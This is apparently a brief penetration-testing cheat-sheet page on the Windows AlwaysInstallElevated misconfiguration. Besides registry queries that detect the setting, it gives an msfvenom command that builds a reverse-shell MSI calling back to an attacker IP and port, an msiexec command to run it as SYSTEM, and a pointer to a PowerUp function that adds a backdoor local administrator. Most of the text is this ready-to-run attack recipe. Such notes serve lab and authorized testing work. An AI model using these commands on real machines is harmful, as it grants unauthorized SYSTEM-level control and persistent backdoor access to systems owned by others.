AlwaysInstallElevated

Overview

AlwaysInstallElevated is a misconfiguration that installs all msi packages as system. Wheels spinning?

Query the registry for the misconfiguration

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Create a malicious msi file

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1338 -f msi -o rev.msi

Pop a shell

msiexec /i rev.msi

You can get a quick win by using the Write-UserAddMSI function from PowerUp.

This function will add a backdoor user to the Local Administrators Group

An RDP sessions is required for this

Last updated 9 months ago